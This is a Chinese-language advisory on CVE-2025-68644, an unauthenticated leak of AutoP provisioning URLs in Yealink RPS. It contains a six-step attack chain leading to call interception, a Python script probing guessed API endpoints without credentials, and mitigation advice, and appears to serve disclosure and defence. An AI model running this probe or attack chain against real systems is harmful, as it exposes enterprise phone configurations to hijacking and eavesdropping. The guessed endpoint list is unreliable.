CVE-2025-68644: Yealink RPS 未授权访问信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-68644

漏洞类型

未授权访问/信息泄露

CVSS评分

7.4 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Yealink RPS (Remote Provisioning Service)

漏洞概述

CVE-2025-68644是Yealink远程配置服务(RPS)中的一个高危信息泄露漏洞。该漏洞存在于2025年6月27日之前的所有Yealink RPS版本中，攻击者可以在无需任何认证的情况下访问系统敏感信息，包括AutoP(自动配置)URL地址等关键配置数据。由于Yealink RPS被广泛用于企业级IP电话的批量配置管理，泄露的AutoP URL可能被攻击者利用来劫持电话配置、窃听通话或进行钓鱼攻击。此漏洞的CVSS评分为7.4，属于高危级别，攻击复杂度低且无需用户交互，威胁程度较高。Yealink已于2025年6月27日通过安全更新部署增强的认证机制修复此问题。

技术细节

该漏洞属于OWASP API Security Top 10中的API1 Broken Object Level Authorization (BOLA)类型。Yealink RPS系统在处理配置请求时存在访问控制缺陷，未对API端点进行充分的权限验证。攻击者可通过构造特定的HTTP请求直接访问管理接口，无需提供任何认证凭证即可获取AutoP URL地址等敏感配置信息。技术层面上，漏洞接口可能存在于RPS的API路径中，攻击者通过枚举或猜测API参数即可触发信息泄露。由于RPS服务通常暴露在网络边界，攻击者可从互联网发起攻击，成功利用后将获取企业电话系统的配置服务器地址，进而可能进行中间人攻击或恶意配置注入。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网络中暴露的Yealink RPS服务端口，通常为HTTP/HTTPS管理界面

STEP 2

步骤2: 漏洞探测

攻击者对RPS API端点发送未授权请求，探测是否存在信息泄露漏洞

STEP 3

步骤3: 敏感信息获取

通过构造特定HTTP请求，无需认证即可获取AutoP URL地址等配置信息

STEP 4

步骤4: 配置劫持准备

获取AutoP服务器地址后，攻击者可部署恶意配置服务器准备中间人攻击

STEP 5

步骤5: 配置注入攻击

通过DNS欺骗或ARP欺骗，将恶意AutoP服务器地址注入到企业电话系统

STEP 6

步骤6: 窃听或钓鱼攻击

利用劫持的配置，攻击者可窃听通话内容、获取企业通讯录或进行定向钓鱼攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-68644 PoC - Yealink RPS Unauthorized Access
# Target: Yealink RPS before 2025-06-27

import requests
import sys
import json

def check_cve_2025_68644(target_url):
    """
    Check if target Yealink RPS is vulnerable to CVE-2025-68644
    This PoC demonstrates unauthorized information disclosure
    """
    
    # Common RPS API endpoints that may expose AutoP URL
    endpoints = [
        "/api/v1/autop/server",
        "/api/provisioning/autop",
        "/rps/api/config",
        "/api/v1/rps/settings",
        "/api/v1/device/config",
        "/autop/url",
        "/api/autop"
    ]
    
    print(f"[*] Testing {target_url} for CVE-2025-68644")
    print(f"[*] Target: Yealink RPS Unauthorized Access to AutoP URL")
    
    vulnerable = False
    
    for endpoint in endpoints:
        url = target_url.rstrip('/') + endpoint
        try:
            # No authentication headers - demonstrating the vulnerability
            response = requests.get(url, timeout=10, verify=False)
            
            if response.status_code == 200:
                # Check if response contains sensitive information
                data = response.json() if response.headers.get('content-type', '').find('json') > -1 else response.text
                
                # Look for AutoP URL patterns
                if 'autop' in str(data).lower() or 'url' in str(data).lower() or 'server' in str(data).lower():
                    print(f"[+] VULNERABLE: {url}")
                    print(f"[+] Status Code: {response.status_code}")
                    print(f"[+] Response: {json.dumps(data, indent=2)[:500]}")
                    vulnerable = True
                    
        except requests.exceptions.RequestException as e:
            print(f"[-] Error testing {url}: {e}")
    
    if not vulnerable:
        print("[*] Target may not be vulnerable or RPS service not found")
    
    return vulnerable

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-68644.py <target_url>")
        print("Example: python cve-2025-68644.py https://rps.example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_cve_2025_68644(target)

影响范围

Yealink RPS < 2025-06-27 (所有在此日期之前的版本)

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在网络边界部署WAF/IPS规则，监控和阻断对RPS API端点的异常访问；2) 将RPS服务隔离在独立的VLAN中，限制横向移动风险；3) 启用HTTP Basic Auth或IP白名单机制临时保护管理接口；4) 监控DNS查询日志，及时发现AutoP服务器地址被恶意篡改的行为；5) 通知用户暂时避免使用自动配置功能，改为手动配置IP电话。